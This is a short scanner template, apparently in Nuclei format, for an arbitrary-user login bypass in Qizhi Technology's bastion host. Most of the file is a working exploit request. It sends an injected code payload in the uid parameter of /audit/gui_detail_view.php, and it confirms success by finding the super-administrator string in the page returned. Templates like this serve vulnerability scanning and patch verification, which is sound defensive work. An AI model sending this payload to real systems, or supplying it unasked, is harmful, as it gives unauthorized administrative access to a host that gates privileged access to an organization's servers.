id: qizhi-login-byPass

info:
  name: 齐治科技运维操作管理系统（堡垒机）任意用户登录
  author: str1am
  severity: high
  reference:
    - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E9%BD%90%E6%B2%BB%E5%A0%A1%E5%9E%92%E6%9C%BA%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86.md
  tags: qizhi,byPass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "超级管理员"

      - type: status
        status:
          - 200